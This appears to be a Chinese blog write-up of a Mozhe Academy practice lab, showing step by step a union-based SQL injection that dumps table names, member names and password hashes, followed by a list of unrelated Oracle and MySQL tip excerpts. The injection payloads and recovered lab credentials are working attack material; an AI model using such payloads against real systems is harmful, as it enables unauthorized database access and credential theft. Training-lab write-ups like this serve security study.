0x00
我这边是利用墨者学院的靶场来进行讲解
靶场地址:https://www.mozhe.cn/bug/detail/elRHc1BCd2VIckQxbjduMG9BVCtkZz09bW96aGUmozhe
SQL注入原理相关文章:https://www.cnblogs.com/lingyi888/p/12886483.html
0x01
开启靶场我们可以看到登录界面
0x02
我们来寻找一下注入点
利用工具啊D我们可以找到注入点
0x03
可以看到是这样的界面
下面我们来进行检测
我直接给出语句就不一步一步截图了
检测语句:
and 1=1 返回正常
and 1=2 返回错误
order by 4 得到有四个字段数
0x04
利用联合查询来查询回显位置
id=-1%20union%20select%201,2,3,4
判断得到
可以知道回显在 2 3这两个字段
接下来,构造拼接语句进行查询
使用回显位爆出数据库名和版本
id=-1%20union%20select%201,database(),version(),4
根据数据库名爆破表名
id=-1%20union%20select%201,group_concat(table_name),3,4%20from%20information_schema.tables%20where%20table_schema%20=%20%22mozhe_Discuz_StormGroup%22#
根据表名爆破列名
id=-1%20union%20select%201,group_concat(column_name),3,4%20from%20information_schema.columns%20where%20table_name%20=%20%22StormGroup_member%22%20#
爆列内容
id=-1%20union%20select%201,group_concat(name),group_concat(password),4%20from%20StormGroup_member%20#
0x05
这边可以看到存在两个账户
密码是md5解密一下就可以得到两个账号,其中一个登录就可以
账号一:
mozhe
dsan13
账号二:
mozhe
451866
登录就可以拿到flag了
ok,今天就到这里,关注我,一起学习哦
查看更多关于【数据库其他】的文章
去重复的sql(Oracle) 去重复的英文
1.利用group by 去重复2.可以利用下面的sql去重复,如下 1) select id,name,sex from (select a.*,row_number() over(partition by a.id,a.set order by name) su from test a ) where su=1 2)select id,name,sex from (select a.*,row_number() over(p
0评论2023-02-10893
Oracle SQL七次提速技巧
以下SQL执行时间按序号递减。1,动态SQL,没有绑定变量,每次执行都做硬解析操作,占用较大的共享池空间,若共享池空间不足,会导致其他SQL语句的解析信息被挤出共享池。create or replace procedure proc1as beginfor i in 1..100000 loop execute imme
0评论2023-02-10755
SQL ORACLE case when函数用法
case when 用法(1)简单case函数:格式: case 列名 when 条件值1 then 选项1 when 条件值1 then 选项2...... else 默认值 end例如: select case job_level when '1' then '1111' when '2' then '2222' when '3' then '3333
0评论2023-02-10564
mysql下如何执行sql脚本 执行SQL脚本
1.编写sql脚本,假设内容如下: create database dearabao; use dearabao; create table niuzi (name varchar(20)); 保存脚本文件,假设我把它保存在F盘的hello world目录下,于是该文件的路径为:F:\hello world\niuzi.sql2.执行sql脚本,可以有2种方法:
0评论2023-02-10699
MySQL 5.7版本sql_mode=only_full_group_by问题
用到GROUP BY 语句查询时com.mysql.jdbc.exceptions.jdbc4.MySQLSyntaxErrorException: Expression #2 of SELECT list is not in GROUP BY clause and contains nonaggregated column 'col_user_6.a.START_TIME' which is not functionally dependent on colu
0评论2023-02-10973
ORACLE中通过SQL语句(alter table)来增加、删除、修改字段
1.添加字段:alter table 表名 add (字段 字段类型) [ default '输入默认值'] [null/not null] ;2.添加备注:comment on column 库名.表名.字段名 is '输入的备注'; 如: 我要在ers_data库中 test表 document_type字段添加备注 comm
0评论2023-02-10584
MySQL与Oracle 差异比较之六触发器
触发器编号类别ORACLEMYSQL注释1创建触发器语句不同create or replace trigger TG_ES_FAC_UNIT before insert or update or delete on ES_FAC_UNIT for each rowcreate trigger `hs_esbs`.`TG_INSERT_ES_FAC_UNIT` BEFORE INSERT on `hs_esbs`.`es_fac_u
0评论2023-02-10914
mysql where条件:某时间字段为今天的sql语句
1.查询:注册时间为今天的所有用户数:select count(*) from customer where TO_DAYS(createtime) = TO_DAYS(NOW())2.获取当前时间到凌晨24点还有多长时间:(Java中可用于判断某时间是否为今天)final Calendar cal = Calendar.getInstance(); ca
0评论2023-02-10717
mysql中的sql
变量用户变量: 在用户变量前加@系统变量: 在系统变量前加@@运算符算术运算符有: +(加), -(减), * (乘), / (除) 和% (求模) 五中运算位运算符有:(位于), | (位或), ^ (位异或), ~ (位取反),(位右移),(位左移)比较运算符有: = (等于),(大于),(小于), = (大
0评论2023-02-10936
Oracle的HINT可以强制指定SQL的执行计划,比如选择索引、表的连接顺序以及表的连接方式等等。(转)
在Oracle中查看所有的表: select * from tab/dba_tables/dba_objects/cat; 看用户建立的表 : select table_name from user_tables; //当前用户的表 select table_name from all_tables; //所有用户的表 select table_name from dba_tables; //包
0评论2023-02-10857
Oracle sql 子字符串长度判断
Oracle sql 子字符串长度判断 select t.* from d_table t WHEREsubstr(t.col,1,1)='8' and instr(t.col,'/')0 and length(substr(t.col,1,instr(t.col,'/')))5; 字符串的前两位都是数字:select * from d_table t WHERE regexp_like(substr(t.col,1,2), '^[
0评论2023-02-10759
Oracle、MySql、Sql Server比对
MySql:廉价(部分免费):当前,MySQL採用双重授权(DualLicensed),他们是GPL和MySQLAB制定的商业许可协议。假设你在一个遵循GPL的***(开源)项目中使用MySQL,那么你能够遵循GPL协议免费使用MySQL。否则,你须要购买MySQLAB制定的那个商业许可协议。Windows $
0评论2023-02-10441
Oracle 存储过程,临时表,动态SQL测试
--创建事务级别的结果临时表create global temporary table tmp_yshy( c1 varchar2(100), c2 varchar2(100))on commit delete rows;--创建事务级别的存储sql语句的临时表create global temporary table tmp_sql( c1 varchar2(4000))on commit delete rows;测
0评论2023-02-10508